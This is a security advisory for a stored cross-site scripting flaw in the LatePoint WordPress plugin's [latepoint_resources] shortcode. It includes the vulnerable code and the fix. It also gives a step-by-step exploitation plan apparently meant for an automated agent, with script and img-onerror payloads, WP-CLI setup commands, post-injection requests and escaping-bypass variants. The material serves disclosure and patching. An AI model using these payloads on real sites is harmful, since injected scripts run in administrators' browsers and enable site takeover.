LatePoint <= 5.3.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Description
The LatePoint – Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'button_caption' parameter in the [latepoint_resources] shortcode in versions up to and including 5.3.0. This is due to insufficient output escaping when the 'items' parameter is set to 'bundles'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:NTechnical Details
What Changed in the Fix
Changes introduced in v5.3.1
Source Code
WordPress.org SVN# Exploitation Research Plan: CVE-2026-4785 (LatePoint Stored XSS) ## 1. Vulnerability Summary The **LatePoint** plugin (up to version 5.3.0) contains a stored cross-site scripting (XSS) vulnerability within the `[latepoint_resources]` shortcode. The vulnerability is caused by insufficient output e…
Show full research plan
Exploitation Research Plan: CVE-2026-4785 (LatePoint Stored XSS)
1. Vulnerability Summary
The LatePoint plugin (up to version 5.3.0) contains a stored cross-site scripting (XSS) vulnerability within the [latepoint_resources] shortcode. The vulnerability is caused by insufficient output escaping of the button_caption attribute when the items attribute is set to 'bundles'. While other item types (like services or agents) may be properly handled, the specific code path for rendering bundles directly concatenates the user-provided caption into the HTML response. This allows an authenticated user with at least Contributor privileges to inject malicious scripts into pages or posts.
2. Attack Vector Analysis
- Endpoint: WordPress Post/Page Editor (Gutenberg or Classic).
- Vulnerable Component: Shortcode rendering engine for
[latepoint_resources]. - Vulnerable Parameter:
button_caption. - Precondition:
items="bundles". - Authentication Level: Contributor+ (any role capable of creating or editing posts and using shortcodes).
- Injection Type: Stored XSS. The payload is stored in the
post_contentand executed whenever the post is rendered for any visitor (including administrators).
3. Code Flow
- Entry Point: A user with Contributor+ permissions saves a post containing the shortcode:
[latepoint_resources items="bundles" button_caption="<script>alert(1)</script>"]. - Shortcode Registration: In
latepoint.php, the plugin initializes. The shortcodelatepoint_resourcesis registered (typically inlib/helpers/shortcodes_helper.php). - Execution Path:
- When the page is viewed, WordPress calls
OsShortcodesHelper::shortcode_latepoint_resources($atts). $attsare parsed usingshortcode_atts, wherebutton_captionis assigned the user's malicious string.- The code enters a
switch ( $atts['items'] )block (found around line 159 inlib/helpers/shortcodes_helper.php). - It enters the
case 'bundles':block. - The plugin retrieves bundle records (likely using
OsBundleModel). - The code iterates through the bundles. For each bundle, it builds an HTML string for a "Book Now" button.
- Sink: The value of
$atts['button_caption']is concatenated into the$outputstring without being passed throughesc_html()oresc_attr().
- When the page is viewed, WordPress calls
- Output: The rendered page contains the raw, unescaped HTML/JavaScript from the
button_caption.
4. Nonce Acquisition Strategy
This vulnerability does not require a nonce to exploit.
- The exploit occurs during the standard rendering of a shortcode inside a post.
- Shortcodes are rendered server-side during the
the_contentfilter execution. - No AJAX requests or specialized REST endpoints are required to trigger the XSS; simply visiting the published post is sufficient.
5. Exploitation Strategy
The goal is to demonstrate that a Contributor can execute JavaScript in the context of an Administrator.
Step 1: Prepare Environment
Ensure at least one "Bundle" exists in LatePoint, otherwise the item loop in the shortcode may not execute, and the vulnerable code path won't be reached.
Step 2: Inject Shortcode (Contributor)
As a Contributor, create a new post with the malicious shortcode.
HTTP Request (via http_request / Playwright):
- Method: POST
- URL:
http://vulnerable-wp.local/wp-admin/post-new.php(or usewp-json/wp/v2/posts) - Headers:
Content-Type: application/x-www-form-urlencoded
- Body Parameters:
post_title:XSS Testcontent:[latepoint_resources items="bundles" button_caption='<img src=x onerror=alert("XSS_SUCCESS")>']status:publish(orpendingif Contributor cannot publish)
Step 3: Trigger Execution (Administrator)
Navigate to the post as an Administrator.
Action: Use browser_navigate to the URL of the created post.
Step 4: Capture Proof
Use browser_eval to check if the payload executed.
// Check for evidence of execution (e.g., a global variable set by payload)
window.XSS_EXECUTED === true
6. Test Data Setup
To ensure the foreach loop for bundles executes, we must use WP-CLI to inject a dummy bundle into the database.
WP-CLI Commands:
# 1. Create a dummy service first (Bundles often require services)
wp eval "
\$service = new OsServiceModel();
\$service->name = 'Test Service';
\$service->save();
"
# 2. Create a dummy bundle
# LatePoint uses custom tables. We use the internal model to ensure correct DB state.
wp eval "
\$bundle = new OsBundleModel();
\$bundle->name = 'Test Bundle';
\$bundle->short_description = 'Description';
\$bundle->status = 'active';
\$bundle->save();
"
# 3. Create a post as contributor
wp post create --post_type=post --post_status=publish --post_author=$(wp user get contributor --field=ID) --post_content='[latepoint_resources items="bundles" button_caption="<img src=x onerror=\"window.XSS_EXECUTED=true;console.log(\'XSS\')\">"]' --post_title='XSS Trigger'
7. Expected Results
- When the page is rendered, the HTML source for the bundle item should contain:
<div class="os-bundle-button"><img src=x onerror="..."></div>(exact structure may vary depending on LatePoint's bundle view template). - The
onerrorevent will fire because the sourcexis invalid. - The JavaScript
window.XSS_EXECUTED=truewill execute in the browser.
8. Verification Steps
- Source Check:
Perform an HTTP GET request to the post URL and check if the raw payload exists:grep -q 'onerror="window.XSS_EXECUTED=true"' - Database State:
Verify the post content is stored correctly:wp post get <ID> --field=post_content - Execution Confirmation:
In the automated agent, usebrowser_eval("window.XSS_EXECUTED")to returntrue.
9. Alternative Approaches
If the button_caption is filtered by WordPress's kses on post save (unlikely for shortcode attributes), try encoding the payload:
- HTML Entities:
button_caption="<img src=x onerror=alert(1)>"(The shortcode parser might decode this before passing to the callback). - Attribute Breakout: If the
button_captionis placed inside an attribute likevalue="...", use:button_caption='"><script>alert(1)</script>'. - Different Items: If
bundlesare disabled, check if the same lack of escaping exists initems="agents"oritems="locations"by reviewing the logic inlib/helpers/shortcodes_helper.phpfor those cases. Based on the vulnerability report,bundlesis the confirmed sink.
Summary
The LatePoint plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the [latepoint_resources] shortcode. Authenticated attackers with Contributor-level permissions or higher can inject malicious JavaScript into the 'button_caption' attribute, which is rendered without escaping when the shortcode is configured to display 'bundles'.
Vulnerable Code
// lib/helpers/shortcodes_helper.php:268 <?php if ( $atts['hide_description'] !== 'yes' && $description = $bundle->short_description ) { ?> <div class="ri-description"><?php echo $description; ?></div> <?php } ?> <div class="ri-buttons <?php echo esc_attr( $btn_wrapper_classes ) ?>"> <a href="#" <?php echo $data_atts ?> class="latepoint-book-button os_trigger_booking latepoint-btn-block <?php echo esc_attr( $btn_classes ); ?>" data-selected-bundle="<?php echo $bundle->id; ?>" > <?php echo $atts['button_caption']; ?> </a> </div>
Security Fix
@@ -269,13 +269,13 @@ <?php } ?> <?php if ( $atts['hide_description'] !== 'yes' && $description = $bundle->short_description ) { ?> - <div class="ri-description"><?php echo $description; ?></div> + <div class="ri-description"><?php echo wp_kses_post( $description ); ?></div> <?php } ?> <div class="ri-buttons <?php echo esc_attr( $btn_wrapper_classes ) ?>"> <a href="#" <?php echo $data_atts ?> class="latepoint-book-button os_trigger_booking latepoint-btn-block <?php echo esc_attr( $btn_classes ); ?>" data-selected-bundle="<?php echo $bundle->id; ?>" > - <?php echo $atts['button_caption']; ?> + <?php echo wp_kses_post( $atts['button_caption'] ); ?> </a> </div> </div>
Exploit Outline
To exploit this vulnerability, an attacker with at least Contributor-level access must create or edit a post and insert a `[latepoint_resources]` shortcode. The payload requires the `items` attribute to be set to `bundles` and the `button_caption` attribute to contain a malicious script (e.g., `button_caption="<img src=x onerror=alert(1)>"`). For the payload to fire, at least one bundle must exist in the LatePoint plugin so that the rendering loop for bundle items is executed. Once the post is saved and viewed by any user (including an administrator), the script in the button caption will execute in the victim's browser context.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.